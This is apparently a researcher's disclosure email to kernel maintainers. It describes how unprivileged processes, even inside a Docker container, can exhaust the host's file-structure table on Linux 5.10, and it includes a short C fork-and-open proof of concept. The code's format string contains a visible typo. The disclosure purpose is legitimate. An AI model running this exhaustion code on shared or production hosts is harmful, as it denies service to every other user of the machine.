Hi, our team has found a problem in fs system on Linux kernel v5.10, leading to DoS attacks.
The struct file can be exhausted by normal users by calling multiple syscalls such as timerfd_create/pipe/open etc. Although the rlimit limits the max fds could be opened by a single process. A normal user can fork multiple processes, repeatedly make the timerfd_create/pipe/open syscalls and exhaust all struct files. As a result, all struct-file-allocation related operations of all other users will fail.
In fact, we try this attack inside a deprivileged docker container without any capabilities. The processes in the docker can exhaust all struct-file on the host kernel. We use a machine with 16G memory. We start 2000 processes, each process with a 1024 limit. In total, around 1613400 number struct-file are consumed and there are no available struct-file in the kernel. The total consumed memory is less than 2G , which is small, so memory control group can not help.
The following code shows a PoC that takes 1613400 number of struct-file, while take all struct-file on host. We evaluate the PoC on intel i5 CPU physical machine + Linux kernel v5.10.0 + Ubuntu 18.04 LTS + Docker 18.06.0-ce.
-----------------------------------------------
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#include<fcntl.h>
int main()
{
for (int i = 1; i < 2000; i++) {
int pid = fork();
if (pid == 0) {
int fd;
char nameout[20];
for (int j = 1; j <= 1020; j++) {
sprintf(nameout, "test&d&d.txt", i, j);
fd = open(nameout, O_CREAT);
}
getchar();
}
}
getchar();
return 0;
}
-----------------------------------------------
Looking forward to your reply!
Nanzi Yang
